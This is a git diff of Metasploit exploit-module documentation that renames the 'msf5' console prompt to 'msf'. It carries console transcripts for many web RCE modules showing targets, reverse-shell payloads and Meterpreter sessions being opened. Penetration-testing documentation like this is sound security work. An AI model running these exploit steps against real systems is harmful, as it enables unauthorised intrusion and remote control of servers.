exploit/multi/http/confluence_widget_connector -msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com +msf > use exploit/multi/http/confluence_widget_connector +msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com RHOST => target.com -msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090 +msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090 RPORT => 8090 -msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 +msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1 SRVHOST => 192.168.0.1 -msf5 exploit(multi/http/confluence_widget_connector) > check +msf exploit(multi/http/confluence_widget_connector) > check [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 [+] target.com:8090 - The target is vulnerable. [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > exploit +msf exploit(multi/http/confluence_widget_connector) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.1:4444 [*] target.com:8090 - Starting the FTP server. [*] target.com:8090 - Started service listener on 192.168.0.1:8021 -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > [*] target.com:8090 - Target being detected as: Linux [*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD [*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt @@ -148,7 +148,7 @@ msf5 exploit(multi/http/confluence_widget_connector) > [+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt [*] target.com:8090 - Waiting for exploit to complete... [*] target.com:8090 - Server stopped. -msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1 +msf exploit(multi/http/confluence_widget_connector) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid @@ -157,5 +157,5 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] target.com - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/confluence_widget_connector) > +msf exploit(multi/http/confluence_widget_connector) > ``` diff --git a/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md b/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md index 90d7877742..edfcc07a76 100644 --- a/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md +++ b/documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md @@ -26,12 +26,12 @@ ### Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04 ``` - msf5 > use exploit/multi/http/getsimplecms_unauth_code_exec - msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137 + msf > use exploit/multi/http/getsimplecms_unauth_code_exec + msf exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137 rhosts => 192.168.37.137 - msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true + msf exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true verbose => true - msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > run + msf exploit(multi/http/getsimplecms_unauth_code_exec) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] GetSimpleCMS version 3315 diff --git a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md index 79d2e8a7e6..76443c529c 100644 --- a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md +++ b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md @@ -48,15 +48,15 @@ ``` -msf5 > use exploit/multi/http/git_submodule_url_exec -msf5 exploit(multi/http/git_submodule_url_exec) > set LHOST 192.168.0.1 +msf > use exploit/multi/http/git_submodule_url_exec +msf exploit(multi/http/git_submodule_url_exec) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 -msf5 exploit(multi/http/git_submodule_url_exec) > exploit +msf exploit(multi/http/git_submodule_url_exec) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.0.1:4444 -msf5 exploit(multi/http/git_submodule_url_exec) > [*] Using URL: http://0.0.0.0:8080/yaDlXuHVnRMMYGQ +msf exploit(multi/http/git_submodule_url_exec) > [*] Using URL: http://0.0.0.0:8080/yaDlXuHVnRMMYGQ [*] Local IP: http://192.168.0.1:8080/yaDlXuHVnRMMYGQ [*] Server started. [*] Malicious Git URI is http://192.168.0.1:8080/ogkvs.git diff --git a/documentation/modules/exploit/multi/http/gitlist_arg_injection.md b/documentation/modules/exploit/multi/http/gitlist_arg_injection.md index 356c18489d..f1e2415ee8 100644 --- a/documentation/modules/exploit/multi/http/gitlist_arg_injection.md +++ b/documentation/modules/exploit/multi/http/gitlist_arg_injection.md @@ -20,12 +20,12 @@ ### Tested on Ubuntu 18.04 x64 ``` - msf5 > use exploit/multi/http/gitlist_arg_injection - msf5 exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141 + msf > use exploit/multi/http/gitlist_arg_injection + msf exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141 rhosts => 192.168.37.141 - msf5 exploit(multi/http/gitlist_arg_injection) > check + msf exploit(multi/http/gitlist_arg_injection) > check [+] 192.168.37.141:80 The target is vulnerable. - msf5 exploit(multi/http/gitlist_arg_injection) > run + msf exploit(multi/http/gitlist_arg_injection) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (37775 bytes) to 192.168.37.141 diff --git a/documentation/modules/exploit/multi/http/horde_csv_rce.md b/documentation/modules/exploit/multi/http/horde_csv_rce.md index b5bc32cbc7..b5d77d55c1 100644 --- a/documentation/modules/exploit/multi/http/horde_csv_rce.md +++ b/documentation/modules/exploit/multi/http/horde_csv_rce.md @@ -29,18 +29,18 @@ pear install --ignore-errors horde/horde_data-2.1.4 ### Horde Groupware Webmail Edition 5.2.22 with Horde Data API 2.1.4 on Debian GNU/Linux 9 ``` -msf5 > use exploit/multi/http/horde_csv_rce -msf5 exploit(multi/http/horde_csv_rce) > set payload php/meterpreter/reverse_tcp +msf > use exploit/multi/http/horde_csv_rce +msf exploit(multi/http/horde_csv_rce) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp -msf5 exploit(multi/http/horde_csv_rce) > set lhost 192.168.1.69 +msf exploit(multi/http/horde_csv_rce) > set lhost 192.168.1.69 lhost => 192.168.1.69 -msf5 exploit(multi/http/horde_csv_rce) > set rhost 192.168.1.69 +msf exploit(multi/http/horde_csv_rce) > set rhost 192.168.1.69 rhost => 192.168.1.69 -msf5 exploit(multi/http/horde_csv_rce) > set username alice +msf exploit(multi/http/horde_csv_rce) > set username alice username => alice -msf5 exploit(multi/http/horde_csv_rce) > set password alice +msf exploit(multi/http/horde_csv_rce) > set password alice password => alice -msf5 exploit(multi/http/horde_csv_rce) > exploit +msf exploit(multi/http/horde_csv_rce) > exploit [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Sending stage (38288 bytes) to 172.17.0.1 diff --git a/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md b/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md index 7bfe033649..3f02d636a3 100644 --- a/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md +++ b/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md @@ -57,7 +57,7 @@ Set this to `true` to override the `check` result during exploitation. ## Usage ``` -msf5 exploit(multi/http/jenkins_metaprogramming) > run +msf exploit(multi/http/jenkins_metaprogramming) > run [*] Started HTTPS reverse handler on https://192.168.1.2:8443 [*] Jenkins 2.137 detected diff --git a/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md b/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md index 2792d39378..cf99bf6409 100644 --- a/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md +++ b/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md @@ -75,18 +75,18 @@ In this scenario, the admin API is not bound to localhost and is therefore avail ``` $ msfconsole -q [*] Starting persistent handler(s)... -msf5 > use exploit/multi/http/kong_gateway_admin_api_rce +msf > use exploit/multi/http/kong_gateway_admin_api_rce [*] No payload configured, defaulting to cmd/unix/reverse_netcat -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > set lhost 192.168.194.131 +msf exploit(multi/http/kong_gateway_admin_api_rce) > set lhost 192.168.194.131 lhost => 192.168.194.131 -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > set rhosts 192.168.194.130 +msf exploit(multi/http/kong_gateway_admin_api_rce) > set rhosts 192.168.194.130 rhosts => 192.168.194.130 -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > run -z +msf exploit(multi/http/kong_gateway_admin_api_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.130:41939) at 2020-10-13 16:24:13 +0100 [*] Session 1 created in the background. -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > sessions +msf exploit(multi/http/kong_gateway_admin_api_rce) > sessions Active sessions =============== @@ -102,18 +102,18 @@ In this scenario, the admin API is bound to localhost and has been forwarded usi ``` $ msfconsole -q -msf5 > use exploit/multi/http/kong_gateway_admin_api_rce +msf > use exploit/multi/http/kong_gateway_admin_api_rce [*] No payload configured, defaulting to cmd/unix/reverse_netcat -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > set rhost 127.0.0.1 +msf exploit(multi/http/kong_gateway_admin_api_rce) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > set public-api-rhost 192.168.194.130 +msf exploit(multi/http/kong_gateway_admin_api_rce) > set public-api-rhost 192.168.194.130 public-api-rhost => 192.168.194.130 -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > run -z +msf exploit(multi/http/kong_gateway_admin_api_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.130:44705) at 2020-10-27 20:57:02 +0000 [*] Session 1 created in the background. -msf5 exploit(multi/http/kong_gateway_admin_api_rce) > sessions +msf exploit(multi/http/kong_gateway_admin_api_rce) > sessions Active sessions =============== diff --git a/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md b/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md index bb50cb5760..b85b9b0d23 100644 --- a/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md +++ b/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md @@ -44,8 +44,8 @@ with the remote classloading server. ### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal) ``` -msf5 > use exploit/multi/http/liferay_java_unmarshalling -msf5 exploit(multi/http/liferay_java_unmarshalling) > options +msf > use exploit/multi/http/liferay_java_unmarshalling +msf exploit(multi/http/liferay_java_unmarshalling) > options Module options (exploit/multi/http/liferay_java_unmarshalling): @@ -77,13 +77,13 @@ Exploit target: 0 Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2 -msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1 +msf exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3 +msf exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3 lhost => 192.168.1.3 -msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888 +msf exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888 srvport => 8888 -msf5 exploit(multi/http/liferay_java_unmarshalling) > run +msf exploit(multi/http/liferay_java_unmarshalling) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/multi/http/maracms_upload_exec.md b/documentation/modules/exploit/multi/http/maracms_upload_exec.md index 98a2d60ee1..d71488e2c9 100644 --- a/documentation/modules/exploit/multi/http/maracms_upload_exec.md +++ b/documentation/modules/exploit/multi/http/maracms_upload_exec.md @@ -58,7 +58,7 @@ Id Name ## Scenarios ### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - PHP target ``` -msf5 exploit(multi/http/maracms_upload_exec) > show options +msf exploit(multi/http/maracms_upload_exec) > show options Module options (exploit/multi/http/maracms_upload_exec): @@ -93,7 +93,7 @@ Exploit target: 0 PHP -msf5 exploit(multi/http/maracms_upload_exec) > run +msf exploit(multi/http/maracms_upload_exec) > run [*] Started reverse TCP handler on 192.168.1.12 :4444 [*] Executing automatic check (disable AutoCheck to override) @@ -115,7 +115,7 @@ meterpreter > ``` ### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - Windows target ``` -msf5 exploit(multi/http/maracms_upload_exec) > run +msf exploit(multi/http/maracms_upload_exec) > run [*] Started reverse TCP handler on 1192.168.1.12:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/multi/http/navigate_cms_rce.md b/documentation/modules/exploit/multi/http/navigate_cms_rce.md index 9b47e11b5e..89984bd39d 100644 --- a/documentation/modules/exploit/multi/http/navigate_cms_rce.md +++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md @@ -26,12 +26,12 @@ This module was tested against Navigate CMS 2.8. ### Navigate CMS on Ubuntu 18.04 ``` -msf5 > use exploit/multi/http/navigate_cms_rce -msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45 +msf > use exploit/multi/http/navigate_cms_rce +msf exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45 RHOST => 192.168.178.45 -msf5 exploit(multi/http/navigate_cms_rce) > check +msf exploit(multi/http/navigate_cms_rce) > check [*] 192.168.178.45:80 The target appears to be vulnerable. -msf5 exploit(multi/http/navigate_cms_rce) > exploit +msf exploit(multi/http/navigate_cms_rce) > exploit [*] Started reverse TCP handler on 192.168.178.35:4444 [+] Login bypass successful diff --git a/documentation/modules/exploit/multi/http/nostromo_code_exec.md b/documentation/modules/exploit/multi/http/nostromo_code_exec.md index cb56bfc570..eafa327838 100644 --- a/documentation/modules/exploit/multi/http/nostromo_code_exec.md +++ b/documentation/modules/exploit/multi/http/nostromo_code_exec.md @@ -24,22 +24,22 @@ Nostromo sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html Example utilizing nostromo 1.9.6 on Ubuntu Linux. ``` -msf5 > use exploit/multi/http/nostromo_code_exec -msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9 +msf > use exploit/multi/http/nostromo_code_exec +msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9 RHOSTS => 192.168.1.9 -msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8000 +msf exploit(multi/http/nostromo_code_exec) > set RPORT 8000 RPORT => 8000 -msf5 exploit(multi/http/nostromo_code_exec) > check +msf exploit(multi/http/nostromo_code_exec) > check [*] 192.168.1.9:8000 - The target appears to be vulnerable. -msf5 exploit(multi/http/nostromo_code_exec) > set target 1 +msf exploit(multi/http/nostromo_code_exec) > set target 1 target => 1 -msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10 +msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 -msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444 +msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/nostromo_code_exec) > run +msf exploit(multi/http/nostromo_code_exec) > run [*] Started reverse TCP handler on 192.168.1.10:4444 [*] Configuring Automatic (Linux Dropper) target @@ -62,22 +62,22 @@ meterpreter > exit nostromo 1.9.6 on OpenBSD. ``` -msf5 > use exploit/multi/http/nostromo_code_exec -msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9 +msf > use exploit/multi/http/nostromo_code_exec +msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9 RHOSTS => 192.168.1.9 -msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8001 +msf exploit(multi/http/nostromo_code_exec) > set RPORT 8001 RPORT => 8001 -msf5 exploit(multi/http/nostromo_code_exec) > check +msf exploit(multi/http/nostromo_code_exec) > check [*] 192.168.1.9:8001 - The target appears to be vulnerable. -msf5 exploit(multi/http/nostromo_code_exec) > set target 0 +msf exploit(multi/http/nostromo_code_exec) > set target 0 target => 0 -msf5 exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl +msf exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl payload => cmd/unix/reverse_perl -msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10 +msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 -msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444 +msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/nostromo_code_exec) > run +msf exploit(multi/http/nostromo_code_exec) > run [*] Started reverse TCP handler on 192.168.1.10:4444 [*] Configuring Automatic (Unix In-Memory) target diff --git a/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md b/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md index cca0bc0ae0..42dc7e27d2 100644 --- a/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md +++ b/documentation/modules/exploit/multi/http/october_upload_bypass_exec.md @@ -24,14 +24,14 @@ ## Verification Steps ``` - msf5 > use exploit/multi/http/october_upload_bypass_exec - msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16 + msf > use exploit/multi/http/october_upload_bypass_exec + msf exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16 rhosts => 10.10.10.16 - msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true + msf exploit(multi/http/october_upload_bypass_exec) > setg verbose true verbose => true - msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8 + msf exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8 lhost => 10.10.14.8 - msf5 exploit(multi/http/october_upload_bypass_exec) > run + msf exploit(multi/http/october_upload_bypass_exec) > run [*] Started reverse TCP handler on 10.10.14.8:4444 [+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP diff --git a/documentation/modules/exploit/multi/http/openmrs_deserialization.md b/documentation/modules/exploit/multi/http/openmrs_deserialization.md index 418a03c429..c7321e472d 100644 --- a/documentation/modules/exploit/multi/http/openmrs_deserialization.md +++ b/documentation/modules/exploit/multi/http/openmrs_deserialization.md @@ -29,14 +29,14 @@ ### OpenMRS Platform `v2.1.2` ``` - msf5 > use exploit/multi/http/openmrs_deserialization - msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.176 + msf > use exploit/multi/http/openmrs_deserialization + msf exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.176 rhosts => 192.168.37.176 - msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone + msf exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone targeturi => /openmrs-standalone - msf5 exploit(multi/http/openmrs_deserialization) > check + msf exploit(multi/http/openmrs_deserialization) > check [*] 192.168.37.176:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2 - msf5 exploit(multi/http/openmrs_deserialization) > run + msf exploit(multi/http/openmrs_deserialization) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Target is running OpenMRS diff --git a/documentation/modules/exploit/multi/http/php_fpm_rce.md b/documentation/modules/exploit/multi/http/php_fpm_rce.md index c6abe55070..8337bb159b 100644 --- a/documentation/modules/exploit/multi/http/php_fpm_rce.md +++ b/documentation/modules/exploit/multi/http/php_fpm_rce.md @@ -128,18 +128,18 @@ configuration provided by the author ### Ubuntu 18.04 + nginx 1.14.0 + PHP 7.1.33dev (fpm-fcgi) (built: Feb 14 2020 16:48:15) ``` -msf5 > use exploit/multi/http/php_fpm_rce -msf5 exploit(multi/http/php_fpm_rce) > set RHOSTS 192.168.6.6 +msf > use exploit/multi/http/php_fpm_rce +msf exploit(multi/http/php_fpm_rce) > set RHOSTS 192.168.6.6 RHOSTS => 192.168.6.6 -msf5 exploit(multi/http/php_fpm_rce) > set RPORT 8080 +msf exploit(multi/http/php_fpm_rce) > set RPORT 8080 RPORT => 8080 -msf5 exploit(multi/http/php_fpm_rce) > set TARGETURI /script.php +msf exploit(multi/http/php_fpm_rce) > set TARGETURI /script.php TARGETURI => /script.php -msf5 exploit(multi/http/php_fpm_rce) > set PAYLOAD php/meterpreter/reverse_tcp +msf exploit(multi/http/php_fpm_rce) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp -msf5 exploit(multi/http/php_fpm_rce) > set LHOST 192.168.6.6 +msf exploit(multi/http/php_fpm_rce) > set LHOST 192.168.6.6 LHOST => 192.168.6.6 -msf5 exploit(multi/http/php_fpm_rce) > run +msf exploit(multi/http/php_fpm_rce) > run [*] Started reverse TCP handler on 192.168.6.6:4444 [*] Sending baseline query... diff --git a/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md b/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md index 0ebc4d0083..09b7bfe1db 100644 --- a/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md +++ b/documentation/modules/exploit/multi/http/phpmyadmin_lfi_rce.md @@ -18,10 +18,10 @@ phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can b ### Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1 ``` -msf5 > use exploit/multi/http/phpmyadmin_lfi_rce -msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122 +msf > use exploit/multi/http/phpmyadmin_lfi_rce +msf exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122 rhosts => 172.22.222.122 -msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run +msf exploit(multi/http/phpmyadmin_lfi_rce) > run [*] Started reverse TCP handler on 172.22.222.190:4444 [*] Sending stage (37775 bytes) to 172.22.222.122 diff --git a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md index e5a824af03..249bc9fcab 100644 --- a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md +++ b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md @@ -37,12 +37,12 @@ when creating a new table as part of the exploit. ### Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8 ``` -msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec -msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122 +msf > use exploit/multi/http/phpmyadmin_null_termination_exec +msf exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122 rhost => 172.22.222.122 -msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database +msf exploit(multi/http/phpmyadmin_null_termination_exec) > set database database => -msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run +msf exploit(multi/http/phpmyadmin_null_termination_exec) > run [*] Started reverse TCP handler on 172.22.222.177:4444 [*] Sending stage (37775 bytes) to 172.22.222.122 diff --git a/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md b/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md index fe5165b415..3d32e41ecc 100644 --- a/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md +++ b/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md @@ -17,9 +17,9 @@ If your target is vulnerable, you will get a shell. you should see an output similar to the following ``` -msf5 exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104 +msf exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104 rhosts => 192.168.56.104 -msf5 exploit(multi/http/phpstudy_backdoor_rce) > run +msf exploit(multi/http/phpstudy_backdoor_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Sending shellcode diff --git a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md index 2cc97ec881..5952d28ab9 100644 --- a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md +++ b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md @@ -37,18 +37,18 @@ Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-proj ### Tested on Pimcore 5.6.6 ``` -msf5 > use exploit/multi/http/pimcore_unserialize_rce -msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com +msf > use exploit/multi/http/pimcore_unserialize_rce +msf exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com rhost => target.com -msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8566 +msf exploit(multi/http/pimcore_unserialize_rce) > set rport 8566 rport => 8566 -msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin +msf exploit(multi/http/pimcore_unserialize_rce) > set username admin username => admin -msf5 exploit(multi/http/pimcore_unserialize_rce) > set password pimcore +msf exploit(multi/http/pimcore_unserialize_rce) > set password pimcore password => pimcore -msf5 exploit(multi/http/pimcore_unserialize_rce) > check +msf exploit(multi/http/pimcore_unserialize_rce) > check [*] 192.168.2.59:8566 - The target service is running, but could not be validated. -msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit +msf exploit(multi/http/pimcore_unserialize_rce) > exploit [*] Started reverse TCP handler on 10.0.8.2:4444 [+] Authentication successful: admin:pimcore @@ -70,24 +70,24 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/pimcore_unserialize_rce) > +msf exploit(multi/http/pimcore_unserialize_rce) > ``` ### Tested on Pimcore 4.6.5 ``` -msf5 > use exploit/multi/http/pimcore_unserialize_rce -msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com +msf > use exploit/multi/http/pimcore_unserialize_rce +msf exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com rhost => target.com -msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8465 +msf exploit(multi/http/pimcore_unserialize_rce) > set rport 8465 rport => 8465 -msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin +msf exploit(multi/http/pimcore_unserialize_rce) > set username admin username => admin -msf5 exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n +msf exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n password => P1mc0r3_4dm1n -msf5 exploit(multi/http/pimcore_unserialize_rce) > check +msf exploit(multi/http/pimcore_unserialize_rce) > check [*] 192.168.2.59:8465 - The target service is running, but could not be validated. -msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit +msf exploit(multi/http/pimcore_unserialize_rce) > exploit [*] Started reverse TCP handler on 10.0.8.2:4444 [+] Authentication successful: admin:P1mc0r3_4dm1n @@ -106,5 +106,5 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/pimcore_unserialize_rce) > -``` \ No newline at end of file +msf exploit(multi/http/pimcore_unserialize_rce) > +``` diff --git a/documentation/modules/exploit/multi/http/playsms_template_injection.md b/documentation/modules/exploit/multi/http/playsms_template_injection.md index 4e205d5c2a..b512aa71cb 100644 --- a/documentation/modules/exploit/multi/http/playsms_template_injection.md +++ b/documentation/modules/exploit/multi/http/playsms_template_injection.md @@ -42,7 +42,7 @@ Available at [Source Forge](https://sourceforge.net/projects/playsms/files/plays ### Playsms on Ubuntu Linux ``` -msf5 exploit(multi/http/playsms_template_injection) > options +msf exploit(multi/http/playsms_template_injection) > options Module options (exploit/multi/http/playsms_template_injection): @@ -71,11 +71,11 @@ Exploit target: 0 PlaySMS Before 1.4.3 -msf5 exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1 +msf exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3 +msf exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3 lhost => 192.168.1.3 -msf5 exploit(multi/http/playsms_template_injection) > run +msf exploit(multi/http/playsms_template_injection) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [+] X-CSRF-Token for login : c62b21bdb395dca92c18446217e31d7f diff --git a/documentation/modules/exploit/multi/http/rails_double_tap.md b/documentation/modules/exploit/multi/http/rails_double_tap.md index 4257fd3de1..0fa2869ebd 100644 --- a/documentation/modules/exploit/multi/http/rails_double_tap.md +++ b/documentation/modules/exploit/multi/http/rails_double_tap.md @@ -80,9 +80,9 @@ Use Ctrl-C to stop ### Metasploit ``` -msf5 exploit(multi/http/rails_double_tap) > check +msf exploit(multi/http/rails_double_tap) > check [+] 172.16.249.141:3000 - The target is vulnerable. -msf5 exploit(multi/http/rails_double_tap) > exploit +msf exploit(multi/http/rails_double_tap) > exploit [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Attempting to retrieve the application name... diff --git a/documentation/modules/exploit/multi/http/solr_velocity_rce.md b/documentation/modules/exploit/multi/http/solr_velocity_rce.md index 8b064ca462..1aa215f47e 100644 --- a/documentation/modules/exploit/multi/http/solr_velocity_rce.md +++ 